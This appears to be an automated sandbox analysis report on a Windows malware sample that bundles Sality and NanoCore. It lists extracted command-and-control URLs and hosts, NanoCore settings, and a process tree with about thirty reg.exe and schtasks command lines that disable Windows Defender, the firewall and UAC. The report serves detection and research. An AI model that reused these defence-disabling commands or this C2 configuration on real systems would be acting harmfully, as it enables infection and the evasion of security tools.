Analysis
max time kernel: 148s
max time network: 145s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 09-10-2024 05:08
Static task: static1
Behavioral task: behavioral1
Sample: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Resource: win7-20240708-en
General
Target: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Size: 17.0MB
MD5: 2b66ca254c7c9100343699af457f9d81
SHA1: 36a13e65f57b4ed2f515e752f7ab29b68aa341c7
SHA256: 1fd3e2f6d6e9166cba0086664635f86ba4b4aaf1277a853cf718f6f24d672d6d
SHA512: 4ad6155146eecfcc5f2638772444056ed2c7ebd6867711be66cab87c3156820ce1bb179b96762ae2db3bb98fca16c0daab5e5dc9da294cb3963cd2ba3151ec85
SSDEEP: 393216:UHNOPJo4+k2Br1BMgUD6okK/o4CgMi4GZfT2qZV5:UtOdB2B0gmNkK/Zv4GZPV
Malware Config
Extracted: sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
http://klkjwre77638dfqwieuoi888.info/

Extracted: nanocore
1.2.2.0
hitexe.endofinternet.net:33045
f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
activate_away_mode: true
backup_connection_host:
backup_dns_server: 8.8.4.4
buffer_size: 65535
build_time: 2020-12-29T23:08:57.329436536Z
bypass_user_account_control: true
bypass_user_account_control_data:
clear_access_control: true
clear_zone_identifier: false
connect_delay: 4000
connection_port: 33045
default_group: Default
enable_debug_mode: true
gc_threshold: 1.048576e+07
keep_alive_timeout: 30000
keyboard_logging: false
lan_timeout: 2500
max_packet_size: 1.048576e+07
mutex: f6e3cbdc-25fe-4e6f-9495-3c5a40bf4ed0
mutex_timeout: 5000
prevent_system_sleep: false
primary_connection_host: hitexe.endofinternet.net
primary_dns_server: 8.8.8.8
request_elevation: true
restart_delay: 5000
run_delay: 0
run_on_startup: true
set_critical_process: true
timeout_interval: 5000
use_custom_dns_server: false
version: 1.2.2.0
wan_timeout: 8000
Signatures
Modifies firewall policy service 3 TTPs 3 IoCs
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | nb660-full.exe

UAC bypass
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nb660-full.exe

Windows security bypass
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | nb660-full.exe
Disables RegEdit via registry modification 1 IoCs
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools = "1" | nb660-full.exe

Disables Task Manager via registry modification

Deletes itself 1 IoCs
Processes: nb660-full.exe
pid | Process
2716 | nb660-full.exe

Executes dropped EXE 4 IoCs
Processes: MsPlaying.exe, MsfUpdate.exe, nb660-full.exe, MsfUpdate.exe
pid | Process
2912 | MsPlaying.exe
2764 | MsfUpdate.exe
2716 | nb660-full.exe
2780 | MsfUpdate.exe

Loads dropped DLL 20 IoCs
Processes: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe, nb660-full.exe, MsfUpdate.exe
pid | Process
2332 | 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe (10 entries)
2716 | nb660-full.exe (8 entries)
2764 | MsfUpdate.exe (1 entry)
2716 | nb660-full.exe (1 entry)

Windows security modification
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | nb660-full.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc | nb660-full.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | nb660-full.exe

Checks whether UAC is enabled
Processes: nb660-full.exe, MsfUpdate.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nb660-full.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | MsfUpdate.exe
Suspicious use of SetThreadContext 1 IoCs
Processes: MsfUpdate.exe
description | pid | Process | procid_target
PID 2764 set thread context of 2780 | 2764 | MsfUpdate.exe | 68

Processes:
resource | yara_rule
behavioral1/memory/2716-65-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-72-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-51-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-59-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-137-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-73-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-66-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-58-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-139-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-57-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-53-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-140-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-141-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-138-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-157-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-160-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-162-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-170-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx
behavioral1/memory/2716-172-0x0000000001E00000-0x0000000002E8E000-memory.dmp | upx

Drops file in Program Files directory 5 IoCs
Processes: nb660-full.exe
description | ioc | Process
File opened for modification | C:\PROGRAM FILES\7-ZIP\7z.exe | nb660-full.exe
File opened for modification | C:\PROGRAM FILES\7-ZIP\7zFM.exe | nb660-full.exe
File opened for modification | C:\PROGRAM FILES\7-ZIP\7zG.exe | nb660-full.exe
File opened for modification | C:\PROGRAM FILES\7-ZIP\Uninstall.exe | nb660-full.exe
File opened for modification | C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\OFFICE14\BCSSYNC.EXE | nb660-full.exe

Drops file in Windows directory 1 IoCs
Processes: nb660-full.exe
description | ioc | Process
File opened for modification | C:\Windows\SYSTEM.INI | nb660-full.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe, MsfUpdate.exe, nb660-full.exe, MsPlaying.exe, schtasks.exe, MsfUpdate.exe
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsfUpdate.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nb660-full.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsPlaying.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MsfUpdate.exe

NSIS installer 2 IoCs
Processes:
resource | yara_rule
behavioral1/files/0x0007000000016ca5-43.dat | nsis_installer_1
behavioral1/files/0x0007000000016ca5-43.dat | nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: nb660-full.exe
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | nb660-full.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nb660-full.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes: nb660-full.exe, MsfUpdate.exe, MsfUpdate.exe
pid | Process
2716 | nb660-full.exe (4 entries)
2764 | MsfUpdate.exe (1 entry)
2780 | MsfUpdate.exe (6 entries)
2716 | nb660-full.exe (11 entries)

Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes: MsfUpdate.exe, nb660-full.exe
pid | Process
2780 | MsfUpdate.exe
2716 | nb660-full.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes: nb660-full.exe, MsfUpdate.exe, MsfUpdate.exe
description | pid | Process
Token: SeDebugPrivilege | 2716 | nb660-full.exe (26 entries)
Token: SeDebugPrivilege | 2764 | MsfUpdate.exe (1 entry)
Token: SeDebugPrivilege | 2780 | MsfUpdate.exe (1 entry)
Token: SeDebugPrivilege | 2716 | nb660-full.exe (2 entries)

Suspicious use of WriteProcessMemory 64 IoCs
Processes: 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe, nb660-full.exe, MsPlaying.exe, cmd.exe
description | pid | Process | procid_target
PID 2332 wrote to memory of 2912 | 2332 | 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe | 31 (4 entries)
PID 2332 wrote to memory of 2764 | 2332 | 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe | 33 (7 entries)
PID 2332 wrote to memory of 2716 | 2332 | 2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe | 34 (4 entries)
PID 2716 wrote to memory of 1108 | 2716 | nb660-full.exe | 19 (1 entry)
PID 2716 wrote to memory of 1172 | 2716 | nb660-full.exe | 20 (1 entry)
PID 2716 wrote to memory of 1228 | 2716 | nb660-full.exe | 21 (1 entry)
PID 2716 wrote to memory of 1080 | 2716 | nb660-full.exe | 23 (1 entry)
PID 2716 wrote to memory of 2912 | 2716 | nb660-full.exe | 31 (2 entries)
PID 2716 wrote to memory of 2416 | 2716 | nb660-full.exe | 32 (1 entry)
PID 2716 wrote to memory of 2764 | 2716 | nb660-full.exe | 33 (2 entries)
PID 2912 wrote to memory of 1900 | 2912 | MsPlaying.exe | 35 (4 entries)
PID 1900 wrote to memory of 1148 | 1900 | cmd.exe | 36 (3 entries)
PID 1900 wrote to memory of 1636 | 1900 | cmd.exe | 37 (3 entries)
PID 1900 wrote to memory of 2064 | 1900 | cmd.exe | 38 (3 entries)
PID 1900 wrote to memory of 1068 | 1900 | cmd.exe | 39 (3 entries)
PID 1900 wrote to memory of 2184 | 1900 | cmd.exe | 40 (3 entries)
PID 1900 wrote to memory of 2200 | 1900 | cmd.exe | 41 (3 entries)
PID 1900 wrote to memory of 2908 | 1900 | cmd.exe | 42 (3 entries)
PID 1900 wrote to memory of 2148 | 1900 | cmd.exe | 43 (3 entries)
PID 1900 wrote to memory of 572 | 1900 | cmd.exe | 44 (3 entries)
PID 1900 wrote to memory of 2208 | 1900 | cmd.exe | 45 (3 entries)
PID 1900 wrote to memory of 2052 | 1900 | cmd.exe | 46 (3 entries)
PID 1900 wrote to memory of 2376 | 1900 | cmd.exe | 47 (3 entries)

System policy modification 1 TTPs 1 IoCs
Processes: nb660-full.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | nb660-full.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
[1] C:\Windows\system32\taskhost.exe
    command line: "taskhost.exe"
    PID: 1108

[1] C:\Windows\system32\Dwm.exe
    command line: "C:\Windows\system32\Dwm.exe"
    PID: 1172

[1] C:\Windows\Explorer.EXE
    command line: C:\Windows\Explorer.EXE
    PID: 1228

    [2] C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\2b66ca254c7c9100343699af457f9d81_JaffaCakes118.exe"
        signatures:
        - Loads dropped DLL
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
        PID: 2332

        [3] C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
            signatures:
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of WriteProcessMemory
            PID: 2912

            [4] C:\Windows\system32\cmd.exe
                command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FA75.tmp\FA76.tmp\FA77.bat C:\Users\Admin\AppData\Local\Temp\MsPlaying.exe"
                signatures:
                - Suspicious use of WriteProcessMemory
                PID: 1900

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                    PID: 1148

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                    PID: 1636

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                    PID: 2064

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                    PID: 1068

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                    PID: 2184

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                    PID: 2200

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                    PID: 2908

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                    PID: 2148

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                    PID: 572

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                    PID: 2208

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                    PID: 2052

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    PID: 2376

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                    PID: 2948

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                    PID: 2944

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                    PID: 2532

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                    PID: 2392

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                    PID: 2436

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                    PID: 448

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                    PID: 612

                [5] C:\Windows\system32\schtasks.exe
                    command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                    PID: 1680

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                    PID: 1200

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                    PID: 1532

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                    PID: 2320

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                    PID: 696

                [5] C:\Windows\system32\reg.exe
                    command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                    PID: 2512

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                    PID: 2196

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                    PID: 2940

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                    PID: 1372

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                    PID: 1780

                [5] C:\Windows\system32\reg.exe
                    command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                    PID: 2124

        [3] C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe"
            signatures:
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
            - System Location Discovery: System Language Discovery
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2764

            [4] C:\Windows\SysWOW64\schtasks.exe
                command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eRuAlzO" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7CBE.tmp"
                signatures:
                - System Location Discovery: System Language Discovery
                - Scheduled Task/Job: Scheduled Task
                PID: 2308

            [4] C:\Users\Admin\AppData\Local\Temp\MsfUpdate.exe
                command line: "{path}"
                signatures:
                - Executes dropped EXE
                - Checks whether UAC is enabled
                - System Location Discovery: System Language Discovery
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious behavior: GetForegroundWindowSpam
                - Suspicious use of AdjustPrivilegeToken
                PID: 2780

        [3] C:\Users\Admin\AppData\Local\Temp\nb660-full.exe
            command line: "C:\Users\Admin\AppData\Local\Temp\nb660-full.exe"
            signatures:
            - Modifies firewall policy service
            - UAC bypass
            - Windows security bypass
            - Disables RegEdit via registry modification
            - Deletes itself
            - Executes dropped EXE
            - Loads dropped DLL
            - Windows security modification
            - Checks whether UAC is enabled
            - Drops file in Program Files directory
            - Drops file in Windows directory
            - System Location Discovery: System Language Discovery
            - Checks processor information in registry
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: GetForegroundWindowSpam
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            - System policy modification
            PID: 2716

[1] C:\Windows\system32\DllHost.exe
    command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    PID: 1080

[1] C:\Windows\system32\conhost.exe
    command line: \??\C:\Windows\system32\conhost.exe "-359708948128964865-790273131-117907456564744033143550086511832053781108039754"
    PID: 2416
Network
MITRE ATT&CK Enterprise v15
Persistence
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (4)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (3)
- Modify Registry (5)
Downloads
Filesize: 3KB
MD5: 665f21a9b6730aa08e62473e481b8c55
SHA1: 717d52e75ac16bf032299828dd61c86af281eb43
SHA256: dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579
SHA512: b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e

Filesize: 934B
MD5: 20e22e58357bf5efd453f66090fabec3
SHA1: 73c9b7e6ef3c3a5b03826f9e274df1a3a36c585d
SHA256: 677447273c583bde1d350dc29f10ac77e2067a6ddfca1eac51e088e969a35e85
SHA512: d8d4558f17767e6821c3fd57c979ae42d710aacf3eb536b81962714fab6dd680e5d6cdd44a7f236e0f7a4cb5bd993c0c3dfa37ace1b44ebb176dbee2c510afb2

Filesize: 1KB
MD5: 4fcce09eb10a2602dbdb757dbd3e5223
SHA1: f9f2b1f9ce1c72969cc56a3b9b033639d1510c27
SHA256: bf31c19e88ed9a1b4ccabdad768d6e4202805fc48b89116c323f12a3e45c9947
SHA512: 1e6de4abecce2bccf20f10c0756be45213e7608982b1c60ddd4efa25af40e3e5d914f931b469328ae8f8308b8405b7c8435f72d143cf440e6c2a923527521302

Filesize: 1KB
MD5: 9059115eface5fff049b74bff0f79087
SHA1: 5db304c4d025542b97f36cd82a0913a3473b87e7
SHA256: 3ec37787b890b40ef9da98873a1553cae14137daef7e509c63281eed084aa436
SHA512: d8e337248179e75103cb858bce575aba70c02857d0e47f1ad2ad6d24decbf9c8b775db0dbf931404d962ec6e06c325eb47a5602bb5e08b3e4c619945a2db3237

Filesize: 3.0MB
MD5: ab43042da67bbac3ee18248ee40d4c7e
SHA1: 10aa258234918a4231ee9a5c222f27c8a9a4d69d
SHA256: fda0366362c09fe1538c6ccca5a67aba4ee3f15da38ba91276dcab13dc7ad4f1
SHA512: b9657448c677ee458c63d09e05edcfdb0e92168155bc39b8c34092b17dd877232d99680fbf6e952b884dd294300d4f0c56ab6f93d07f506bc017f3988ef8538c

Filesize: 919KB
MD5: a102b1ee34e498fb8458a6be30ba15e7
SHA1: b586c1bc68a67b6fc7762d5ce7ecae8343d8e006
SHA256: 0b533b19d6e78fdb0e9c7c3616da7641f3b8f9a2761da345efba417a15cc72c6
SHA512: 0b49ce905e76f643019643e9ac42aaf31cdf50ed8294420a936ccce0eca0749d1baddb3c80a28a24ca6f91cd6ff044ec6dea9b4bd5e36c65341395199848483b

Filesize: 12.5MB
MD5: d8865f463ff9f148fc62ca1a0e3db0fd
SHA1: 1bdd1e03a7002261810ca0d39d785d53c2b2bb3c
SHA256: fd56f3d15c22eacf304b5ecd000a39158f7dd43a139d22140f28d5d621fc1fc7
SHA512: 83e01c03754a56b546514e8bd15d84fcf5c996f472189a492070d57edbadd16e07dc17180254508589f9b56221cbb24946bc6d281bb04a000f5375d9b6b7e937

Filesize: 14KB
MD5: 325b008aec81e5aaa57096f05d4212b5
SHA1: 27a2d89747a20305b6518438eff5b9f57f7df5c3
SHA256: c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b
SHA512: 18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf

Filesize: 5KB
MD5: 9384f4007c492d4fa040924f31c00166
SHA1: aba37faef30d7c445584c688a0b5638f5db31c7b
SHA256: 60a964095af1be79f6a99b22212fefe2d16f5a0afd7e707d14394e4143e3f4f5
SHA512: 68f158887e24302673227adffc688fd3edabf097d7f5410f983e06c6b9c7344ca1d8a45c7fa05553adcc5987993df3a298763477168d4842e554c4eb93b9aaaf

Filesize: 11KB
MD5: c17103ae9072a06da581dec998343fc1
SHA1: b72148c6bdfaada8b8c3f950e610ee7cf1da1f8d
SHA256: dc58d8ad81cacb0c1ed72e33bff8f23ea40b5252b5bb55d393a0903e6819ae2f
SHA512: d32a71aaef18e993f28096d536e41c4d016850721b31171513ce28bbd805a54fd290b7c3e9d935f72e676a1acfb4f0dcc89d95040a0dd29f2b6975855c18986f

Filesize: 13KB
MD5: 29858669d7da388d1e62b4fd5337af12
SHA1: 756b94898429a9025a04ae227f060952f1149a5f
SHA256: c24c005daa7f5578c4372b38d1be6be5e27ef3ba2cdb9b67fee15cac406eba62
SHA512: 6f4d538f2fe0681f357bab73f633943c539ddc1451efa1d1bb76d70bb47aa68a05849e36ae405cc4664598a8194227fa7053de6dbce7d6c52a20301293b3c85f

Filesize: 4KB
MD5: 7579ade7ae1747a31960a228ce02e666
SHA1: 8ec8571a296737e819dcf86353a43fcf8ec63351
SHA256: 564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5
SHA512: a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

Filesize: 4KB
MD5: d25102051b33f61c9f7fb564a4556219
SHA1: c683964c11d5175171bd009cb08f87592c923f85
SHA256: e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398
SHA512: 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0

Filesize: 9KB
MD5: c10e04dd4ad4277d5adc951bb331c777
SHA1: b1e30808198a3ae6d6d1cca62df8893dc2a7ad43
SHA256: e31ad6c6e82e603378cb6b80e67d0e0dcd9cf384e1199ac5a65cb4935680021a
SHA512: 853a5564bf751d40484ea482444c6958457cb4a17fb973cf870f03f201b8b2643be41bccde00f6b2026dc0c3d113e6481b0dc4c7b0f3ae7966d38c92c6b5862e